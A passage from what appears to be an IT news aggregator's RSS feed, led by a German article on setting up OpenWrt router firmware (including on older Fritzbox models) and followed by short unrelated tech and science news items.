<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef20724ea2b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/Der-beste-Router.png?w=1200" alt="Der beste Router" class="wp-image-3059996" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry mit Material von Fritz und Telekom</p></div>



<h2 class="wp-block-heading toc">Architektur und Funktionsprinzip</h2>



<p>OpenWrt stellt kein fest definiertes Funktionspaket bereit, sondern ein modulares System. Nach der Installation steht ein minimales Basissystem zur Verfügung, das Routing, Netzwerkdienste und Firewall-Regeln abbildet. Weitere Funktionen lassen sich über Pakete nachinstallieren. Dazu zählen DNS-Server, VPN-Dienste, Monitoring-Werkzeuge oder Werbeblocker.</p>



<p>Die Verwaltung erfolgt über die Weboberfläche “LuCI” sowie optional über die Kommandozeile. Beide Wege greifen auf dieselbe Konfigurationsbasis zu. Änderungen wirken unmittelbar auf das System und lassen sich jederzeit anpassen. Dadurch behalten Sie die vollständige Kontrolle über alle Netzwerkfunktionen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef20724f411"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/shells_terminals_begriffe_linux_6.jpg?quality=50&amp;strip=all" alt="SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet." class="wp-image-3044515" width="800" height="291" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading toc">Hardwareanforderungen und Geräteauswahl</h2>



<p>OpenWrt läuft auf einer großen Bandbreite an Geräten. Voraussetzung bleibt die Unterstützung durch das Projekt. Vor der Installation muss geprüft werden, <a href="https://openwrt.org/supported_devices" target="_blank" rel="noreferrer noopener">ob ein Router kompatibel ist</a>. Im Heimnetz oder in kleinen Unternehmen kommen häufig günstige Consumer-Router zum Einsatz. Viele Modelle lassen sich direkt mit OpenWrt flashen. Entsprechende Geräte sind breit verfügbar, auch <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">im Handel finden sich passende Modelle</a>.</p>



<p>Ein weiterer Ansatz nutzt vorhandene Hardware im Haushalt oder Büro. Ältere Router, darunter auch frühere Gerätegenerationen der Fritzbox, lassen sich oft weiterverwenden. OpenWrt ersetzt dabei die veraltete Firmware und stellt aktuelle Funktionen sowie Sicherheitsupdates bereit. Dadurch verlängert sich die Nutzungsdauer deutlich und vorhandene Hardware erhält neue Einsatzmöglichkeiten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef20724ff95"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-01.png?w=1200" alt="Openwrt bietet viele Möglichkeiten" class="wp-image-3111024" width="1200" height="821" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Installation und erste Schritte</h2>



<p>Die Installation erfolgt modellabhängig. In vielen Fällen reicht ein Firmware-Update über die Weboberfläche des Herstellers. Dabei wird ein spezielles Image eingespielt, das OpenWrt enthält. Nach einem Neustart übernimmt das System die Kontrolle über das Gerät. Nach der Installation stellt OpenWrt eine Standardkonfiguration bereit. Der Zugriff erfolgt über die IP-Adresse 192.168.1.1. Zu Beginn ist kein Passwort gesetzt, weshalb unmittelbar ein Zugang konfiguriert werden muss.</p>



<p>In der Praxis folgt danach die grundlegende Netzwerkkonfiguration. Dazu zählen die WAN-/Internet-Anbindung über DHCP oder PPPoE, die Einrichtung von LAN-Segmenten sowie die Aktivierung des WLANs. OpenWrt stellt hierfür bereits vordefinierte Schnittstellen bereit, die sich anpassen lassen.</p>



<p>Ein typisches Szenario nutzt OpenWrt als zentralen Router hinter einem bestehenden Internetanschluss. Nach der Installation wird die WAN-Internet-Schnittstelle auf DHCP gesetzt. Das Gerät erhält automatisch eine IP-Adresse vom vorhandenen Router oder Modem. </p>



<p>Anschließend erfolgt die WLAN-Konfiguration. OpenWrt erkennt vorhandene Funkmodule und stellt separate Schnittstellen für 2,4 GHz und 5 GHz bereit. Sie definieren SSIDs, wählen Verschlüsselung und setzen Zugriffsschlüssel. WPA2 oder WPA3 stehen dabei ebenfalls zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef2072508f5"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-02.png?w=1200" alt="Openwrt einrichten" class="wp-image-3111025" width="1200" height="455" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Praxisbeispiel im Heimnetz</h2>



<p>Ergänzend lässt sich die Firewall anpassen. OpenWrt verwendet standardmäßig getrennte Zonen für LAN und WAN/Internet. Regeln können erweitert werden, um Portfreigaben oder interne Dienste abzubilden. VLANs lassen sich direkt über die Netzwerkschnittstellen konfigurieren, wodurch sich separate Netze für Gäste oder IoT-Geräte realisieren lassen.</p>



<p>Ein weiteres praktisches Szenario umfasst die Integration eines VPN-Dienstes. OpenWrt unterstützt zum Beispiel WireGuard oder OpenVPN. Damit lässt sich ein sicherer Zugriff auf das Heimnetz aus externen Netzen umsetzen. Ebenso kann der gesamte Datenverkehr über einen VPN-Anbieter geleitet werden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef2072512b3"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/vpn_open_vpn_wireguard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="VPN: Wireguard oder Open VPN?" class="wp-image-2883359" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">monticello / Shutterstock.com</p></div>



<h2 class="wp-block-heading toc">Neue Funktionen in OpenWrt 25.12.x</h2>



<p>Version 25.12 bringt mehrere technische Änderungen, die den Betrieb vereinfachen und erweitern. Eine zentrale Neuerung betrifft die Systemaktualisierung. Die Funktion “Attended SysUpgrade” integriert Updates direkt in die Weboberfläche. OpenWrt lädt passende Images automatisch und berücksichtigt installierte Pakete. </p>



<p>Dadurch entfällt die manuelle Neuinstallation von Erweiterungen nach einem Update. Ein weiterer Schritt betrifft den Paketmanager. Statt des bisherigen Systems kommt der Alpine Package Keeper zum Einsatz. Die neue Paketverwaltung arbeitet ressourcenschonend und nutzt signierte Pakete. Befehle ändern sich entsprechend, was bei manueller Administration berücksichtigt werden muss.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef207251be4"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-03.png" alt="OpenWrt herunterladen" class="wp-image-3111026" width="940" height="395" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Zusätzlich führt OpenWrt eine optionale Shell-Historie ein. Befehle bleiben damit auch nach Sitzungsende verfügbar. Die Integration eines Video-Feeds erweitert den Router um Funktionen zur Verarbeitung von Kamera-Streams. In Verbindung mit VPN ergibt sich eine einfache Lösung für entfernten Zugriff auf Videoquellen.</p>



<p>Die WLAN-Verwaltung wurde intern überarbeitet. Skripte basieren auf einer neuen Laufzeitumgebung, was die Wartbarkeit verbessert und bestimmte Abläufe beschleunigt. Ergänzend erweitert sich die Hardwareunterstützung um zahlreiche neue Geräte und Chipsätze.</p>



<h2 class="wp-block-heading toc">Vorteile im praktischen Einsatz</h2>



<p>OpenWrt bietet vollständige Kontrolle über das Netzwerk. Alle Konfigurationsparameter bleiben zugänglich und lassen sich an individuelle Anforderungen anpassen. Herstellerabhängigkeiten entfallen, da das System auf unterschiedlichen Geräten identisch arbeitet. Ein weiterer Vorteil liegt in der Update-Strategie. </p>



<p>OpenWrt erhält kontinuierlich Sicherheitsupdates, auch für ältere Hardware. Dadurch bleibt die Infrastruktur langfristig wartbar, auch wenn ein Gerät vom eigentlichen Hersteller nicht mehr unterstützt wird.</p>



<p>Die modulare Architektur ermöglicht eine gezielte Erweiterung. Sie installieren nur benötigte Komponenten und halten das System schlank. Gleichzeitig lassen sich komplexe Funktionen auf kompakten Geräten realisieren.</p>



<h2 class="wp-block-heading toc">Einschränkungen und Aufwand</h2>



<p>Die Flexibilität bringt einen höheren Konfigurationsaufwand mit sich. OpenWrt erfordert grundlegende Kenntnisse in Netzwerktechnik und Linux. Viele Funktionen stehen nicht automatisch bereit, sondern müssen eingerichtet werden. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69ef20725265d"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/12/pcw02_Get-DnsClientServerAddress_RGBeci.jpg?quality=50&amp;strip=all" alt="Cmdlet Get-DnsClientServerAddress" class="wp-image-3018113" width="1024" height="421" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>In einem Heimnetz erfahren Sie über das Cmdlet Get-DnsClientServerAddress in der Regel lediglich die IP-Adresse Ihres Routers.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Auch die Hardware setzt Grenzen. Consumer-Router verfügen über begrenzten Speicher und Rechenleistung. Umfangreiche Dienste oder hohe Datenraten erfordern leistungsfähigere Geräte. Die Installation birgt ein gewisses Risiko. </p>



<p>Fehler beim Flash-Vorgang können ein Gerät unbrauchbar machen. Daher sind die Auswahl kompatibler Hardware und die Beachtung der jeweiligen Anleitung zwingend erforderlich.</p>



<h2 class="wp-block-heading toc">OpenWrt auf der Fritzbox</h2>



<p>OpenWrt lässt sich auf bestimmten Fritzbox-Modellen installieren, sofern die Hardware auf unterstützten SoCs basiert und der Bootprozess keine restriktiven Signaturprüfungen erzwingt. Relevant sind vor allem ältere Gerätegenerationen mit Lantiq- oder Atheros-Chipsätzen. Dazu zählen unter anderem AVM Fritzbox 7362 SL, AVM Fritzbox 7412, AVM Fritzbox 7430 sowie AVM Fritzbox 3490 (<a href="https://www.pcwelt.de/article/1157690/fritzbox-router-im-vergleich-das-beste-modell.html" target="_blank" rel="noreferrer noopener">Fritzbox-Router im Vergleich: Welches ist das beste Modell?</a>). Diese Geräte besitzen in der Regel ausreichend RAM und Flash für ein minimales OpenWrt-System und lassen sich über Recovery-Mechanismen oder modifizierte Firmware-Images flashen. Die Installation erfolgt modellabhängig über das AVM-Recovery-Tool, den EVA-Bootloader oder ein Web-Interface, sofern ein passendes Factory-Image vorliegt.</p>



<p>Technisch relevant bleibt die Trennung zwischen Router- und DSL-Funktion. Die DSL-Modems in Fritzboxen basieren auf proprietären Firmware-Blobs, für die keine freien Treiber verfügbar sind. OpenWrt nutzt daher bei diesen Geräten nur die Routing- und Switching-Komponenten. In der Praxis läuft die Box dann hinter einem externen Modem oder einem vorgeschalteten Router. Ethernet-Ports, VLAN-Konfiguration und Firewall arbeiten vollständig unter OpenWrt, das integrierte DSL-Interface bleibt jedoch ungenutzt.</p>



<p>Auch beim WLAN ergeben sich Unterschiede. Ältere Modelle mit Atheros- oder kompatiblen Chips lassen sich meist vollständig integrieren, inklusive WPA2 und WPA3. Bei Lantiq-Plattformen kann die WLAN-Leistung eingeschränkt sein, da Hardware-Offloading oder proprietäre Erweiterungen fehlen. <strong>Aber Achtung: Funktionen aus FRITZ!OS wie DECT-Basisstation, Telefonie oder AVM-spezifische Dienste stehen unter OpenWrt nicht zur Verfügung, da diese eng an die Originalfirmware gebunden sind.</strong></p>



<p>Neuere Geräte wie <a href="https://amazon.de/dp/B07SJTR4DD?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 7590</a> (<a href="https://www.pcwelt.de/article/1166494/test-die-fritzbox-7590-auf-dem-pruefstand.html" target="_blank" rel="noreferrer noopener">Testbericht</a>) oder <a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html">AVM Fritzbox 7530 </a>(<a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html" target="_blank" rel="noreferrer noopener">Testbericht)</a> verwenden modernere SoCs mit stärker abgesicherter Bootkette und proprietären Treibern für DSL und WLAN. Für diese Plattformen existiert kein stabiler OpenWrt-Support. Selbst wenn ein Start möglich wäre, fehlen zentrale Hardwarefunktionen oder die Initialisierung bleibt unvollständig. Kabelmodelle wie <a href="https://amazon.de/dp/B0CKTQSSW2?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 6660 Cable</a> sind grundsätzlich ausgeschlossen, da die DOCSIS-Komponenten vollständig proprietär arbeiten.</p>



<p>Ältere Fritzboxen eignen sich als kostengünstige OpenWrt-Systeme für Routing, VLAN-Segmentierung, VPN-Gateways oder als Access Point. Die Geräte erhalten aktuelle Kernel-Versionen und Sicherheitsupdates, obwohl der Hersteller keine Pflege mehr liefert. Für produktive Internetanschlüsse mit integrierter DSL- oder Kabelanbindung bleibt die Originalfirmware erforderlich, da OpenWrt diese Hardwarebereiche nicht unterstützt.</p>



<h2 class="wp-block-heading toc">Einsatz im kleinen Unternehmen</h2>



<p>In kleinen Unternehmen dient OpenWrt als flexible Netzwerkzentrale. Mehrere VLANs trennen interne Systeme, Gästezugänge und IoT-Komponenten. VPN-Verbindungen verbinden Außenstandorte oder ermöglichen mobilen Zugriff. Durch die Kombination aus Firewall, Routing und Zusatzdiensten lässt sich damit eine kompakte Infrastruktur ohne separate Appliances erstellen. Gleichzeitig bleibt die Konfiguration vollständig kontrollierbar und anpassbar.</p>



<p>OpenWrt ersetzt damit in vielen Szenarien klassische Router-Firmware und erweitert den Funktionsumfang deutlich.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Friday Squid Blogging: How Squid Survived Extinction Events]]></title>
<description><![CDATA[Science news:
Scientists have finally cracked a long-standing mystery about squid and cuttlefish evolution by analyzing newly sequenced genomes alongside global datasets. The research reveals that these bizarre, intelligent creatures likely originated deep in the ocean over 100 million years ago,...]]></description>
<link>https://tsecurity.de/de/3462710/reverse-engineering/friday-squid-blogging-how-squid-survived-extinction-events/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3462710/reverse-engineering/friday-squid-blogging-how-squid-survived-extinction-events/</guid>
<pubDate>Fri, 24 Apr 2026 23:06:53 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Science <a href="https://www.sciencedaily.com/releases/2026/03/260331001100.htm">news</a>:</p>
<blockquote><p>Scientists have finally cracked a long-standing mystery about squid and cuttlefish evolution by analyzing newly sequenced genomes alongside global datasets. The research reveals that these bizarre, intelligent creatures likely originated deep in the ocean over 100 million years ago, surviving mass extinction events by retreating into oxygen-rich deep-sea refuges. For millions of years, their evolution barely changed—until a dramatic post-extinction boom sparked rapid diversification as they moved into new shallow-water habitats. ...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[South of Midnight is even better on PS5 than it was on Xbox — PlayStation gamers, you no longer have to miss out on a sublime and underrated mix of fighting, platforming, and Southern Gothic folklore]]></title>
<description><![CDATA[South of Midnight's gorgeous, stylized presentation really pops on PlayStation 5, while its peppy performance ensures owners of Sony's platform will be fully immersed in one of last year's best single-player, story-driven action-adventures.]]></description>
<link>https://tsecurity.de/de/3461727/it-nachrichten/south-of-midnight-is-even-better-on-ps5-than-it-was-on-xbox-playstation-gamers-you-no-longer-have-to-miss-out-on-a-sublime-and-underrated-mix-of-fighting-platforming-and-southern-gothic-folklore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461727/it-nachrichten/south-of-midnight-is-even-better-on-ps5-than-it-was-on-xbox-playstation-gamers-you-no-longer-have-to-miss-out-on-a-sublime-and-underrated-mix-of-fighting-platforming-and-southern-gothic-folklore/</guid>
<pubDate>Fri, 24 Apr 2026 16:02:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[South of Midnight's gorgeous, stylized presentation really pops on PlayStation 5, while its peppy performance ensures owners of Sony's platform will be fully immersed in one of last year's best single-player, story-driven action-adventures.]]></content:encoded>
</item>
<item>
<title><![CDATA[World of Warcraft: Blizzard entschuldigt sich für misslungenen Midnight-Patch]]></title>
<description><![CDATA[Massive Probleme zum Start von Update 12.0.5: Blizzard räumt Fehler bei World of Warcraft ein und verspricht Besserung. (World of Warcraft, MMORPG)]]></description>
<link>https://tsecurity.de/de/3461237/it-nachrichten/world-of-warcraft-blizzard-entschuldigt-sich-fuer-misslungenen-midnight-patch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461237/it-nachrichten/world-of-warcraft-blizzard-entschuldigt-sich-fuer-misslungenen-midnight-patch/</guid>
<pubDate>Fri, 24 Apr 2026 13:16:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Massive Probleme zum Start von Update 12.0.5: Blizzard räumt Fehler bei World of Warcraft ein und verspricht Besserung. (<a href="https://www.golem.de/specials/wow/">World of Warcraft</a>, <a href="https://www.golem.de/specials/mmorpg/">MMORPG</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=207975&amp;page=1&amp;ts=1777028461" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Meet Noscroll, an AI bot that does your doomscrolling for you]]></title>
<description><![CDATA[Noscroll wants to cure doomscrolling with an AI bot that reads the internet for you.]]></description>
<link>https://tsecurity.de/de/3459282/it-nachrichten/meet-noscroll-an-ai-bot-that-does-your-doomscrolling-for-you/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3459282/it-nachrichten/meet-noscroll-an-ai-bot-that-does-your-doomscrolling-for-you/</guid>
<pubDate>Thu, 23 Apr 2026 21:46:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Noscroll wants to cure doomscrolling with an AI bot that reads the internet for you.]]></content:encoded>
</item>
<item>
<title><![CDATA[Great news, the Moto G Stylus is no longer teeming with bloatware]]></title>
<description><![CDATA[The 2026 edition of Motorola's stylus phone is plenty appealing. My review unit is a charming lilac color, has a pleasantly textured back panel, and includes a MicroSD slot and what might be the last surviving headphone jack on a mainstream phone sold in North America. The namesake stylus is no l...]]></description>
<link>https://tsecurity.de/de/3459007/it-nachrichten/great-news-the-moto-g-stylus-is-no-longer-teeming-with-bloatware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3459007/it-nachrichten/great-news-the-moto-g-stylus-is-no-longer-teeming-with-bloatware/</guid>
<pubDate>Thu, 23 Apr 2026 19:46:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The 2026 edition of Motorola's stylus phone is plenty appealing. My review unit is a charming lilac color, has a pleasantly textured back panel, and includes a MicroSD slot and what might be the last surviving headphone jack on a mainstream phone sold in North America. The namesake stylus is no longer just a fancy […]]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI is upending SaaS tools]]></title>
<description><![CDATA[It’s quite clear that agentic coding has completely taken over the software development world. Writing code will never be the same. Shoot, it won’t be long before we aren’t writing any code at all because agents can write it better and faster than we humans can. That may already be true today. 

...]]></description>
<link>https://tsecurity.de/de/3458562/ai-nachrichten/how-ai-is-upending-saas-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3458562/ai-nachrichten/how-ai-is-upending-saas-tools/</guid>
<pubDate>Thu, 23 Apr 2026 17:17:57 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It’s quite clear that agentic coding has completely taken over the software development world. Writing code will never be the same. Shoot, it won’t be long before we aren’t writing any code at all because agents can write it better and faster than we humans can. That may already be true today. </p>



<p>But there is more to software development than merely writing code, and those areas—<a href="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html" data-type="link" data-id="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html">source control</a>, documentation, <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a>, project management—are ripe for some serious disruption from AI as well. Those areas may well be hit harder than coding itself. </p>



<p>I would imagine that if you were in the business of analyzing data and providing dashboard-level insights into that data, then you would be very worried indeed about what AI is going to do to your value proposition. Much of the SaaS industry is in the business of analyzing existing data, and that is exactly what AI agents can do well. When a simple question can get straight to the heart of what a pricey dashboard provides, then companies have to question the value of paying for that kind of service.  </p>



<p>Tools like LinearB, Jellyfish, and Swarmia provide deep and interesting insights into what is going on inside your repository, but if you can say to <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, “What are the DORA metrics for this repository?”, well, then those businesses are definitely ripe for disruption, no? </p>



<h2 class="wp-block-heading">Pivoting to AI</h2>



<p>Those tools are already reacting by pivoting hard and leaning into the AI revolution. They are doing things like focusing on measuring AI processes instead of providing team insights. These tools are now pitching that they monitor not your development team but your AI development process, which is the kind of thing they have to do when the ground under their feet is shifting. The disruption is real, and they have to change or die. </p>



